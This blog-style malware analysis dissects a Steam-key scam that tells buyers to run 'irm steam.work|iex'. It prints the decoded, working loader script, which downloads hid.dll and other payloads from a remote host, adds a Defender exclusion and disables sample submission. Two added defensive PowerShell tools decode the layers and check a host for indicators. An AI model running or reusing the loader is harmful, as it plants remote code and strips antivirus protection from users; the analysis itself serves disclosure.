Preface
A while ago I bought a "genuine" Steam activation key for a game on Taobao, but after delivery I was told to run a PowerShell command, and that immediately felt wrong.
Analysis of irm steam.work|iex
Fetching the URL returns a PowerShell command like this:
powershell -encodedCommand "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"
After base64 decoding:
$vzwnbqd = [System.Convert]::FromBase64String("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")
$bmoyqc = [System.Convert]::FromBase64String("UA2KbGiLuLYKGNKXp0I85SK9AD1BOac/a0nGz4Bc9Zs=")
$hjfmpy = New-Object "System.Security.Cryptography.AesManaged"
$hjfmpy.Mode = [System.Security.Cryptography.CipherMode]::ECB
$hjfmpy.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$hjfmpy.BlockSize = 128
$hjfmpy.KeySize = 128
$hjfmpy.Key = $bmoyqc
$hjfmpy.IV = $vzwnbqd[0..15]
$nczb = New-Object System.IO.MemoryStream
$wvpqm = New-Object System.IO.MemoryStream(,$hjfmpy.CreateDecryptor().TransformFinalBlock($vzwnbqd,16,$vzwnbqd.Length-16))
$jcaibsx = New-Object System.IO.Compression.DeflateStream $wvpqm, ([IO.Compression.CompressionMode]::Decompress)
$jcaibsx.CopyTo($nczb)
$hjfmpy.Dispose()
$jcaibsx.Close()
$wvpqm.Close()
$wvreq = [System.Text.Encoding]::UTF8.GetString($nczb.ToArray())
Invoke-Expression($wvreq)
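As an added example (not code from the original post), the loader's decode chain turned into an analyst tool: it peels every wrapped layer offline, writes each decoded stage to disk, and never hands the result to Invoke-Expression. It assumes every layer follows the pattern above (two FromBase64String("...") literals, ciphertext with a 16-byte prefix followed by the key, AES/ECB/PKCS7, then raw Deflate) and that the outermost layer may be a -encodedCommand line.

```powershell
# Added example, not code from the original post. Assumes each layer matches the loader above:
# two FromBase64String("...") literals (ciphertext with 16-byte prefix, then key), AES/ECB/PKCS7,
# raw Deflate; the outermost text may be a "-encodedCommand" line (base64 of UTF-16LE script).
function Expand-LoaderStage {
    param(
        [Parameter(Mandatory)][string]$Stage,   # the command line or an already decoded layer
        [string]$OutDir = '.\stages'
    )
    New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
    $layer = 0
    while ($true) {
        # Outer form: powershell -encodedCommand "<base64 of a UTF-16LE script>"
        if ($Stage -match '-encodedCommand\s+"?([A-Za-z0-9+/=]+)') {
            $Stage = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))
        }
        # Inner form: the first base64 literal is the ciphertext, the second is the AES key
        $b64 = @([regex]::Matches($Stage, 'FromBase64String\("([A-Za-z0-9+/=]+)"\)') |
                ForEach-Object { $_.Groups[1].Value })
        if ($b64.Count -lt 2) { break }     # no further wrapped layer: $Stage is the final script
        $blob = [Convert]::FromBase64String($b64[0])
        $key  = [Convert]::FromBase64String($b64[1])
        $aes = [System.Security.Cryptography.Aes]::Create()
        $aes.Mode = 'ECB'; $aes.Padding = 'PKCS7'; $aes.Key = $key
        # ECB ignores any IV, so the 16-byte prefix the loader stores as "IV" is simply skipped
        $plain = $aes.CreateDecryptor().TransformFinalBlock($blob, 16, $blob.Length - 16)
        $aes.Dispose()
        $src = New-Object IO.MemoryStream(,$plain)
        $dst = New-Object IO.MemoryStream
        $inflate = New-Object IO.Compression.DeflateStream($src, [IO.Compression.CompressionMode]::Decompress)
        $inflate.CopyTo($dst); $inflate.Dispose(); $src.Dispose()
        $Stage = [Text.Encoding]::UTF8.GetString($dst.ToArray())
        $layer++
        $path = Join-Path $OutDir "stage$layer.ps1"
        Set-Content -Path $path -Value $Stage -Encoding UTF8
        Write-Host "layer $layer decoded -> $path ($($Stage.Length) chars)"
    }
    return $Stage   # review this text in an editor; never pipe it to iex
}
# Usage: Expand-LoaderStage -Stage (Get-Content .\steam.work.txt -Raw)
```

A wrong key or a layer that does not follow the pattern surfaces as a CryptographicException from TransformFinalBlock rather than as executed code.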
Three layers of AES wrapping; once unpacked it yields:
cls
Write-Host -NoNewline " _____ _____ _____ _____ _____ `r" -ForegroundColor:blue
Write-Host -NoNewline " /\ \ /\ \ /\ \ /\ \ /\ \ `r" -ForegroundColor:blue
Write-Host -NoNewline " /::\ \ /::\ \ /::\ \ /::\ \ /::\____\ `r" -ForegroundColor:blue
Write-Host -NoNewline " /::::\ \ \:::\ \ /::::\ \ /::::\ \ /::::| | `r" -ForegroundColor:blue
Write-Host -NoNewline " /::::::\ \ \:::\ \ /::::::\ \ /::::::\ \ /:::::| | `r" -ForegroundColor:blue
Write-Host -NoNewline " /:::/\:::\ \ \:::\ \ /:::/\:::\ \ /:::/\:::\ \ /::::::| | `r" -ForegroundColor:blue
Write-Host -NoNewline " /:::/__\:::\ \ \:::\ \ /:::/__\:::\ \ /:::/__\:::\ \ /:::/|::| | `r" -ForegroundColor:blue
Write-Host -NoNewline " \:::\ \:::\ \ /::::\ \ /::::\ \:::\ \ /::::\ \:::\ \ /:::/ |::| | `r" -ForegroundColor:blue
Write-Host -NoNewline " ___\:::\ \:::\ \ /::::::\ \ /::::::\ \:::\ \ /::::::\ \:::\ \ /:::/ |::|___|______ `r" -ForegroundColor:blue
Write-Host -NoNewline " /\ \:::\ \:::\ \ /:::/\:::\ \ /:::/\:::\ \:::\ \ /:::/\:::\ \:::\ \ /:::/ |::::::::\ \ `r" -ForegroundColor:blue
Write-Host -NoNewline "/::\ \:::\ \:::\____\ /:::/ \:::\____\/:::/__\:::\ \:::\____\/:::/ \:::\ \:::\____\/:::/ |:::::::::\____\`r" -ForegroundColor:blue
Write-Host -NoNewline "\:::\ \:::\ \::/ / /:::/ \::/ /\:::\ \:::\ \::/ /\::/ \:::\ /:::/ /\::/ / ~~~~~/:::/ /`r" -ForegroundColor:blue
Write-Host -NoNewline " \:::\ \:::\ \/____/ /:::/ / \/____/ \:::\ \:::\ \/____/ \/____/ \:::\/:::/ / \/____/ /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \:::\ \:::\ \ /:::/ / \:::\ \:::\ \ \::::::/ / /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \:::\ \:::\____\ /:::/ / \:::\ \:::\____\ \::::/ / /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \:::\ /:::/ / \::/ / \:::\ \::/ / /:::/ / /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \:::\/:::/ / \/____/ \:::\ \/____/ /:::/ / /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \::::::/ / \:::\ \ /:::/ / /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \::::/ / \:::\____\ /:::/ / /:::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \::/ / \::/ / \::/ / \::/ / `r" -ForegroundColor:blue
Write-Host -NoNewline " \/____/ \/____/ \/____/ \/____/ `r" -ForegroundColor:blue
function Get-RandomString() {
    param(
        [int]$length=10,
        # [int] here is a type constraint
        [char[]]$sourcedata
    )
    for($loop=1; $loop -le $length; $loop++) {
        $TempPassword+=($sourcedata | GET-RANDOM | %{[char]$_})
    }
    return $TempPassword
}
Start-Sleep 1
$tempLog = $env:TEMP+ "\log.txt"
try{
    irm -Uri "https://hz-config.oss-accelerate.aliyuncs.com/help.txt" -OutFile $tempLog
}
catch{
    Write-Host "NetWork Result-Error" -ForegroundColor:red
}
function PwStart() {
    try
    {
        $steamPath = (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Valve\Steam\ActiveProcess" -ErrorAction Stop).'SteamClientDll'
        $steamPath = $steamPath -replace "steamclient.dll","hid.dll"
        if(Get-Process 360Tray* -ErrorAction Stop){
            while(Get-Process 360Tray* -ErrorAction Stop){
                Write-Host (Get-Content $tempLog)[0] -ForegroundColor:Red
                Start-Sleep 1.5
            }
            PwStart
        }
        elseif(Get-Process 360sd* -ErrorAction Stop)
        {
            while(Get-Process 360sd* -ErrorAction Stop){
                Write-Host (Get-Content $tempLog)[1] -ForegroundColor:Red
                Start-Sleep 1.5
            }
            PwStart
        }
        else{
            try{
                Stop-Process -Name steam* -Force -ErrorAction Stop
                Start-Sleep 1
                # check once more in case the exit failed
                if(Get-Process steam* -ErrorAction Stop){
                    TASKKILL /F /IM "steam.exe" | Out-Null
                    Start-Sleep 2
                }
                # no antivirus detected, proceed to the next step
                if (Test-Path $steamPath) {
                    Start-Sleep 1
                    del $steamPath
                    if (Test-Path $steamPath)
                    {
                        Remove-Item -Path $steamPath -Force
                        Start-Sleep 1
                    }
                    Start-Sleep 0.5
                }
                $steamPath = $steamPath -replace "hid.dll","version.dll"
                if (Test-Path $steamPath) {
                    Start-Sleep 0.5
                    Remove-Item -Path $steamPath -Force
                    Start-Sleep 0.5
                }
                $steamPath = $steamPath -replace "version.dll","user32.dll"
                if (Test-Path $steamPath) {
                    Start-Sleep 0.5
                    Remove-Item -Path $steamPath -Force
                    Start-Sleep 0.5
                }
                $steamPath = $steamPath -replace "user32.dll","hid.dll"
                Write-Host "ServerStart [OK]" -ForegroundColor:green
                try
                {
                    Add-MpPreference -ExclusionPath $steamPath
                    Set-MpPreference -SubmitSamplesConsent 0
                }
                catch
                {
                }
                Write-Host "Result[0] [OK]" -ForegroundColor:green
                Invoke-WebRequest -Uri "https://hz-config.oss-accelerate.aliyuncs.com/dwf/PSH" -OutFile $steamPath -ErrorAction Stop
                Write-Host "Result[1] [OK]" -ForegroundColor:green
                $strfmt = -join ($env:LOCALAPPDATA,"\SteamActive")
                if (!(Test-Path $strfmt)) {
                    md $strfmt | Out-Null
                    Start-Sleep 1
                    if (!(Test-Path $strfmt)) {
                        New-Item $strfmt -ItemType directory -Force | Out-Null
                    }
                }
                $strfmt = -join ($env:LOCALAPPDATA,"\SteamActive\hid")
                Invoke-WebRequest -Uri "https://hz-config.oss-accelerate.aliyuncs.com/dwf/hid" -OutFile $strfmt -ErrorAction Stop
                Write-Host "Result[2] [OK]" -ForegroundColor:green
                Start-Sleep 0.5
                Start steam://
                # connected to the server; enter the activation code in Steam, the window closes automatically after 5 seconds
                Write-Host (Get-Content $tempLog)[3] -ForegroundColor:green
                Start-Sleep 5
                # end of run
                exit
            }
            catch
            {
                # please reopen PowerShell, choosing "Run as administrator"
                Write-Host (Get-Content $tempLog)[2] -ForegroundColor:Red
            }
        }
    }
    catch{
        # please check whether your Steam is installed correctly
        Write-Host (Get-Content $tempLog)[4] -ForegroundColor:red
    }
}
# start
PwStart
This command does the following:
- downloads a script from the internet and executes it
- the script is wrapped in three layers of AES encryption [to protect the author's mother]
- adds a Windows Defender exclusion that removes protection from the Steam directory
- closes antivirus processes such as 360
- deletes several DLL files from the Steam directory
- downloads a hid.dll from the internet and drops it into Steam's local directory
- and downloads further libraries used for the crack
hid.dll is a system dynamic library; HID is short for Human Interface Device, which in plain terms means it handles user input devices such as the mouse and keyboard. Planting a copy here is usually done so that Steam's input-device handling first passes through the attacker's hook before being handed on to the system for the normal operation.
Behavior analysis of steamworks.exe
The exe it downloads is also flagged as malicious by the ThreatBook (微步) sandbox.
The files it replaces let the seller modify your files remotely, which may mean that if you ask for a refund they wipe your Steam, and so on...
Running the downloaded steamworks.exe forcibly terminates the Steam client process.
steamworks.exe then drops a Python runtime library and several images of an "enter product code" dialog into the temp folder.
A few seconds after launch, a window pops up.
Since Steam has already been killed at this point, it is easy to guess that this window is drawn from the images just dropped into the temp folder.
Submitting the CDK the Taobao seller gave us, we see a file 111111.zip being downloaded over the network.
Looking up the game 123 we want to activate on SteamDB, 123's ID is exactly 111111.
Unzipping it reveals the game's manifest file and key file.
Presumably these were generated by SteamTools, a Steam "free unlock" tool.
Clearly the "game CDK" the seller provided is actually the game's app ID, used to download the corresponding free-unlock package for that ID.
steamworks.exe then copies TEVI's manifest file into the depotcache folder under the Steam directory and modifies several configuration files, including config.vdf.
It then writes a User32.dll into the Steam directory.
Behavior analysis of User32.dll
User32.dll is obviously there for hijack injection; inspecting it in IDA reveals a GreenLuma string.
Searching for GreenLuma shows that it is also a Steam unlock tool.
Clearly steamworks.exe uses GreenLuma to perform the hijack injection and unlocks the game with the manifest and key files obtained earlier.
Finally, it pops up an "activation successful" window and restarts Steam.
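As an added example (not code from the original post), a triage function that checks a Windows host for the indicators described in the summary list and in the steamworks.exe/User32.dll analysis above: DLLs with system-library names planted next to steam.exe (and whether they carry the GreenLuma string), the SteamActive staging folder, the Defender exclusion and SubmitSamplesConsent change, and recent writes to depotcache and config.vdf. It assumes Steam's install directory can be read from HKCU\Software\Valve\Steam\SteamPath (falling back to the default install path) and only reports; it deletes nothing.

```powershell
# Added example, not code from the original post. Assumes the Steam install directory is in
# HKCU\Software\Valve\Steam\SteamPath (falls back to the default path) and only reports findings.
function Test-SteamLoaderIndicators {
    $findings = @()
    $steamDir = (Get-ItemProperty 'HKCU:\Software\Valve\Steam' -ErrorAction SilentlyContinue).SteamPath
    if (-not $steamDir) { $steamDir = "${env:ProgramFiles(x86)}\Steam" }
    $steamDir = $steamDir -replace '/', '\'

    # 1. DLLs carrying system-library names next to steam.exe: the side-loading setup seen above.
    foreach ($name in 'hid.dll', 'version.dll', 'user32.dll') {
        $p = Join-Path $steamDir $name
        if (Test-Path $p) {
            $sig = (Get-AuthenticodeSignature $p).Status
            $ascii = [Text.Encoding]::ASCII.GetString([IO.File]::ReadAllBytes($p))
            $tag = if ($ascii -match 'GreenLuma') { ', contains "GreenLuma"' } else { '' }
            $findings += "planted DLL: $p (signature $sig$tag)"
        }
    }
    # 2. Staging folder the loader creates for its second download.
    $stage = Join-Path $env:LOCALAPPDATA 'SteamActive'
    if (Test-Path $stage) { $findings += "staging folder present: $stage" }

    # 3. Defender tampering: an exclusion on the Steam directory, automatic sample submission off.
    $mp = Get-MpPreference -ErrorAction SilentlyContinue
    if ($mp) {
        foreach ($ex in @($mp.ExclusionPath)) {
            if ($ex -and $ex -like "$steamDir*") { $findings += "Defender exclusion: $ex" }
        }
        if ($mp.SubmitSamplesConsent -eq 0) { $findings += 'Defender SubmitSamplesConsent is 0 (automatic submission off)' }
    }
    # 4. Recent writes to the files steamworks.exe edits to plant the manifest.
    foreach ($rel in 'config\config.vdf', 'depotcache') {
        $item = Get-Item (Join-Path $steamDir $rel) -ErrorAction SilentlyContinue
        if ($item -and $item.LastWriteTime -gt (Get-Date).AddDays(-7)) {
            $findings += "recently modified: $($item.FullName) ($($item.LastWriteTime))"
        }
    }
    return $findings
}
Test-SteamLoaderIndicators | ForEach-Object { Write-Warning $_ }
```

Run it from an elevated PowerShell so that Get-MpPreference can read the Defender settings; an empty result means none of the listed indicators were found, not that the host is clean.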